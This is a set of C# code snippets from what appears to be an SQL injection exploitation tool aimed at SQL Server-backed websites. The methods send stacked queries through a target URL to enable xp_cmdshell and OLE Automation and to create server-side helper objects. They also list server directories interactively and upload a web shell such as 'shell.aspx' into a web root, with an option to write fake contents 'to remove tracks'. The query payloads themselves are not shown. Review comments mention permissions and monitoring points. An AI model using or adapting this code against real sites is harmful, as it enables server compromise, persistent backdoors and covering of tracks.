Exemplo n.º 1
        /// <summary>
        /// Interactive entry point for the directory-listing feature: probes the target URL,
        /// creates the server-side listing helper, then forwards each path typed by the
        /// operator to <c>navigate</c> until "x" is entered.
        /// </summary>
        /// <param name="url">Target URL handed to QueryCrafter and to the helper methods.</param>
        /// <remarks>
        /// The helper object is dropped (QueriesDB.DropFuncQuery) only on the path where
        /// createFuncDir reported success; the return value of dropObject is not inspected.
        /// Every step depends on the target accepting a stacked statement through <paramref name="url"/>
        /// (helpers not shown here), which a parameterised query on the server side would not allow.
        /// </remarks>
        public static void initialize(string url)
        {
            Log.logNotification("Confirming Web Response..");

            var probeUrl = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);

            // Guard: stop early when the probe reply does not pass the confirmation check.
            if (!ResponseFilter.confirmResponce(probeUrl, QueriesDB.Replacement))
            {
                Log.logError("No response from the server..");
                return;
            }

            Log.logNotification("Web Response is OK..");

            // Nothing to list with (and nothing to clean up) if the helper was not created.
            if (!createFuncDir(url))
            {
                return;
            }

            // Prompt loop: "x" is the only exit token; every other answer is treated as a path.
            while (true)
            {
                string requestedPath = UserInteraction.takeInputString("Press 'x' for Exit..\nEnter Directory to get listing.. eg C:\\, C:\\users\\.. ");

                if (requestedPath == "x")
                {
                    break;
                }

                navigate(url, requestedPath);
            }

            dropObject(url, QueriesDB.DropFuncQuery);
        }
Exemplo n.º 2
        /// <summary>
        /// Runs a two-step fetch: first a request built from <paramref name="stackedQuery"/>,
        /// then a second request whose body is filtered and parsed into a string array.
        /// </summary>
        /// <param name="url">Target URL used to build both requests.</param>
        /// <param name="stackedQuery">Query text passed to QueryCrafter.construcQueryForTableDump.</param>
        /// <param name="replacement">Value passed to the confirmation check for the first request.</param>
        /// <returns>
        /// The array produced by ResponseFilter.parseResponce, or null when the first request is
        /// not confirmed or the second request yields no response.
        /// </returns>
        /// <remarks>
        /// NOTE(review): the helper names suggest the first request stages rows in a temporary
        /// table that the second request reads back; the helpers are not part of this listing.
        /// </remarks>
        public static string[] getObjects(string url, string stackedQuery, string replacement)
        {
            string stagingUrl = QueryCrafter.construcQueryForTableDump(url, stackedQuery, replacement);

            // Without a confirmed first step there is nothing to read back.
            if (!ResponseFilter.confirmResponce(stagingUrl, replacement))
            {
                return null;
            }

            string readbackUrl = QueryCrafter.constructURLForOutputFromTempTable(url);
            var body = HTTPMethods.getResponse(readbackUrl);

            if (body == null)
            {
                return null;
            }

            body = ResponseFilter.getPureResponse(body);
            return ResponseFilter.parseResponce(body);
        }
Exemplo n.º 3
        /// <summary>
        /// Builds a request from the stacked query stored in QueriesDB.EnableXPCMDShell, swaps the
        /// literal placeholder <c>'rummykhan'</c> for QueriesDB.Replacement, and reports whether
        /// ResponseFilter.confirmResponce accepted the reply.
        /// </summary>
        /// <param name="url">Target URL passed to QueryCrafter.constructStackedQuery.</param>
        /// <returns>true when the confirmation check passes, otherwise false.</returns>
        /// <remarks>
        /// The query text is not visible in this listing. On SQL Server, xp_cmdshell is disabled by
        /// default and turning it on is a server configuration change that needs the ALTER SETTINGS
        /// permission (held by sysadmin and serveradmin), so a least-privileged application login
        /// cannot complete this step; the configuration change is also recorded in the SQL Server
        /// error log, which makes it a practical alerting point.
        /// </remarks>
        public static bool enableXPCMDShell(string url)
        {
            string requestUrl = QueryCrafter.constructStackedQuery(url, QueriesDB.EnableXPCMDShell);
            requestUrl = requestUrl.Replace("'rummykhan'", QueriesDB.Replacement);

            if (!ResponseFilter.confirmResponce(requestUrl, QueriesDB.Replacement))
            {
                Log.logError("Failed to Enable XP CMD Shell..");
                return false;
            }

            Log.logOutput("XP CMD Shell Enabled..");
            return true;
        }
Exemplo n.º 4
        /// <summary>
        /// Builds a request from the stacked query stored in QueriesDB.EnableOLEAutomation, swaps the
        /// literal placeholder <c>'rummykhan'</c> for QueriesDB.Replacement, and reports whether
        /// ResponseFilter.confirmResponce accepted the reply.
        /// </summary>
        /// <param name="url">Target URL passed to QueryCrafter.constructStackedQuery.</param>
        /// <returns>true when the confirmation check passes, otherwise false.</returns>
        /// <remarks>
        /// The query text is not visible in this listing. On SQL Server the "Ole Automation
        /// Procedures" option is off by default and changing it needs the ALTER SETTINGS permission
        /// (held by sysadmin and serveradmin); an application login without that permission cannot
        /// complete this step, and the option change is written to the SQL Server error log.
        /// </remarks>
        public static bool enableOLEAutomation(string url)
        {
            string requestUrl = QueryCrafter.constructStackedQuery(url, QueriesDB.EnableOLEAutomation);
            requestUrl = requestUrl.Replace("'rummykhan'", QueriesDB.Replacement);

            if (!ResponseFilter.confirmResponce(requestUrl, QueriesDB.Replacement))
            {
                Log.logError("Failed to Enable OLE Automation Procedures..");
                return false;
            }

            Log.logOutput("OLE Automation Enabled..");
            return true;
        }
Exemplo n.º 5
        /// <summary>
        /// Probes the target URL and, when the reply passes the confirmation check, hands the
        /// URL on to <c>getTables</c>.
        /// </summary>
        /// <param name="url">Target URL used for the probe and passed to getTables.</param>
        /// <remarks>
        /// A failed probe is only logged; no exception is raised and nothing is returned to the caller.
        /// </remarks>
        public static void initialize(string url)
        {
            Log.logNotification("Confirming Web Response..");

            var probeUrl = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);

            // Guard: without a confirmed probe reply the table enumeration is not attempted.
            if (!ResponseFilter.confirmResponce(probeUrl, QueriesDB.Replacement))
            {
                Log.logError("No response from the server..");
                return;
            }

            Log.logNotification("Web Response is OK..");
            getTables(url);
        }
Exemplo n.º 6
        /// <summary>
        /// Sends the stacked query in QueriesDB.UploadFileProcQuery and then verifies, with a
        /// second request, that an object named "FcUk" is reported back by the server.
        /// </summary>
        /// <param name="url">Target URL used to build both requests.</param>
        /// <returns>
        /// true only when the creation request is confirmed and the follow-up lookup returns
        /// exactly "FcUk"; false on any other outcome, including an exception.
        /// </returns>
        /// <remarks>
        /// The numeric prefixes in the error messages distinguish a name mismatch ("1") from a
        /// missing response ("2"). NOTE(review): the log text calls the object a procedure; if so,
        /// creating it needs CREATE PROCEDURE rights in the database, which an application login
        /// restricted to reading and writing its own tables would not have.
        /// </remarks>
        static bool createProcFcUk(string url)
        {
            try
            {
                var creationUrl = QueryCrafter.constructStackedQuery(url, QueriesDB.UploadFileProcQuery);
                creationUrl = QueryCrafter.constructURLForConfirmation(creationUrl, QueriesDB.Replacement);

                // Step 1: the creation request itself must pass the confirmation check.
                if (!ResponseFilter.confirmResponce(creationUrl, QueriesDB.Replacement))
                {
                    Log.logError("Erroneous response from the server..");
                    Log.logError("Procedure to Upload Shell cannot be created..");
                    return false;
                }

                // Step 2: look the object up again and compare the reported name.
                var lookupUrl = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmFcUkProcQuery);
                var reply = HTTPMethods.getResponse(lookupUrl);

                if (reply == null)
                {
                    Log.logError("2 Procedure to Upload Shell cannot be created..");
                    return false;
                }

                if (ResponseFilter.getPureResponseWithLastIndex(reply) != "FcUk")
                {
                    Log.logError("1 Procedure to Upload Shell cannot be created..");
                    return false;
                }

                Log.logOutput("Procedure to Upload Shell is created..");
                return true;
            }
            catch (Exception failure)
            {
                // Any failure in the helpers is reduced to a log line and a false result.
                Log.logError(failure.Message);
                return false;
            }
        }
Exemplo n.º 7
        /// <summary>
        /// Sends the stacked query in QueriesDB.DirListingFuncQuery and then verifies, with a
        /// second request, that an object named "Dir" is reported back by the server.
        /// </summary>
        /// <param name="url">Target URL used to build both requests.</param>
        /// <returns>
        /// true only when the creation request is confirmed and the follow-up lookup returns
        /// exactly "Dir"; false on any other outcome, including an exception.
        /// </returns>
        /// <remarks>
        /// NOTE(review): the log text calls the object a function; if so, creating it needs
        /// CREATE FUNCTION rights in the database, which an application login restricted to
        /// reading and writing its own tables would not have.
        /// </remarks>
        static bool createFuncDir(string url)
        {
            try
            {
                var creationUrl = QueryCrafter.constructStackedQuery(url, QueriesDB.DirListingFuncQuery);
                creationUrl = QueryCrafter.constructURLForConfirmation(creationUrl, QueriesDB.Replacement);

                // Step 1: the creation request itself must pass the confirmation check.
                if (!ResponseFilter.confirmResponce(creationUrl, QueriesDB.Replacement))
                {
                    Log.logError("Erroneous response from the server..");
                    Log.logError("Function to get Directory Listing cannot be created..");
                    return false;
                }

                // Step 2: look the object up again and compare the reported name.
                var lookupUrl = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmDirFuncQuery);
                var reply = HTTPMethods.getResponse(lookupUrl);

                if (reply == null)
                {
                    Log.logError("Function to get Directory Listing cannot be created..");
                    return false;
                }

                if (ResponseFilter.getPureResponseWithLastIndex(reply) != "Dir")
                {
                    Log.logError("Function to get Directory Listing cannot be created..");
                    return false;
                }

                Log.logOutput("Function to get Directory Listing is created..");
                return true;
            }
            catch (Exception failure)
            {
                // Any failure in the helpers is reduced to a log line and a false result.
                Log.logError(failure.Message);
                return false;
            }
        }
Exemplo n.º 8
 /// <summary>
 /// Builds a request from <paramref name="ObjectDroppingQuery"/> and reports whether the
 /// server's reply passed the confirmation check.
 /// </summary>
 /// <param name="url">Target URL passed to QueryCrafter.constructURLForDroppingObject.</param>
 /// <param name="ObjectDroppingQuery">Query text identifying the object to drop.</param>
 /// <returns>The result of the confirmation check; false when an exception is caught.</returns>
 /// <remarks>
 /// Nothing is logged on an unconfirmed drop, so a caller that ignores the return value
 /// gets no indication that the object may still exist in the database.
 /// </remarks>
 static bool dropObject(string url, string ObjectDroppingQuery)
 {
     try
     {
         var dropUrl = QueryCrafter.constructURLForDroppingObject(url, ObjectDroppingQuery);
         dropUrl = QueryCrafter.constructURLForConfirmation(dropUrl, QueriesDB.Replacement);

         // The confirmation result is the method's result.
         return ResponseFilter.confirmResponce(dropUrl, QueriesDB.Replacement);
     }
     catch (Exception failure)
     {
         Log.logError(failure.Message);
         return false;
     }
 }
Exemplo n.º 9
        /// <summary>
        /// Interactive entry point for the file-upload feature: probes the target URL, creates the
        /// server-side helper via createProcFcUk, then repeatedly asks the operator for a folder,
        /// a file name and a content variant, sends the resulting request and checks the outcome
        /// with confirmFileUpload.
        /// </summary>
        /// <param name="url">Target URL handed to QueryCrafter and to the helper methods.</param>
        /// <remarks>
        /// Operator input is substituted into the request text as typed; no validation or encoding
        /// is applied in this method. The order of the three Replace calls matters, because a later
        /// substitution also acts on text inserted by an earlier one.
        /// dropObject runs on every confirmed-probe path, including when createProcFcUk returned
        /// false, and its return value is not inspected.
        /// NOTE(review): the prompts indicate the file is written under a web-served folder; on the
        /// defending side that makes new or modified script files under web roots, written by the
        /// database service account, the artefact to monitor. The write mechanism itself lives in
        /// QueriesDB and is not visible in this listing.
        /// </remarks>
        public static void Spawn(string url)
        {
            Log.logNotification("Confirming Web Response..");

            var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);

            // Nothing else is attempted unless the probe reply passes the confirmation check.
            if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement))
            {
                Log.logNotification("Web Response is OK..");

                if (createProcFcUk(url))
                {
                    // "z" is only a non-"x" seed so the loop body runs at least once.
                    string RootPath = "z";
                    while (RootPath != "x")
                    {
                        RootPath = UserInteraction.takeInputString("Press x for Exit..\nEnter root for folder path C:\\websites\\somedir\\ ");
                        if (RootPath != "x")
                        {
                            string fileName = UserInteraction.takeInputString("Enter filename to upload eg. shell.aspx ..");

                            string UrlForUploading = null;

                            string x = UserInteraction.takeInputString("Press 'r' for using Real Shell Contents..\nPress 'f' for fake Shell Contens to remove tracks..");

                            // Only "f" selects the FAKE query; any other answer (not just "r") selects REAL.
                            if (x == "f")
                            {
                                UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryFAKE);
                            }
                            else
                            {
                                UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryREAL);
                            }


                            // Fill the template placeholders with the operator's answers, then swap the
                            // literal marker "rummykhan" for QueriesDB.Replacement.
                            UrlForUploading = UrlForUploading.Replace("[PATH]", RootPath);
                            UrlForUploading = UrlForUploading.Replace("[FILENAME]", fileName);
                            UrlForUploading = UrlForUploading.Replace("rummykhan", QueriesDB.Replacement);

                            Log.logNotification("Uploading shell to " + RootPath + fileName);

                            // An unconfirmed reply falls through silently: there is no else branch and no log line.
                            if (ResponseFilter.confirmResponce(UrlForUploading, QueriesDB.Replacement))
                            {
                                Log.logNotification("Confirming File Upload..");
                                // The path is formed by plain concatenation, so RootPath must already end
                                // with a separator for the check to address the intended file.
                                if (confirmFileUpload(url, RootPath + fileName))
                                {
                                    Log.logOutput("Shell uploaded successfully to : " + RootPath + fileName);
                                }
                                else
                                {
                                    Log.logError("Fail to upload file..");
                                }
                            }
                        }
                    }
                }
                // Runs whether or not createProcFcUk succeeded.
                dropObject(url, QueriesDB.DropFcUkProcQuery);
            }
            else
            {
                Log.logError("No response from the server..");
            }
        }